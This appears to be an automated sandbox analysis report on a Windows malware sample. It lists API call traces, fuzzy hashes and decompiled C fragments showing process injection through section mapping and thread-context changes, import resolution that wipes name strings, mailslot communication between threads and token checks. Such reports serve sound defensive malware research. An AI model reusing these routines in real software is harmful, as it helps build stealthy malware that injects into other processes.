    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;          // total bytes received so far
				_v8 = 0x1000;      // error/status code returned to the caller
				// create a local mailslot with a 0x1000-byte maximum message size
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					// E004011F2 wraps RtlAllocateHeap (see APIs below): initial 0x1000-byte buffer
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;   // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							// read one message into the buffer at the current offset
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									// 0x79 == ERROR_SEM_TIMEOUT: no message yet, keep polling
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								// grow the buffer by another 0x1000 bytes and advance the write offset
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;   // success so far
									goto L8;
								}
							}
							goto L11;   // any other read error ends the loop
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);   // stop once a short (final) message was read
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					// on success hand the buffer and its length back through the caller's structure
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
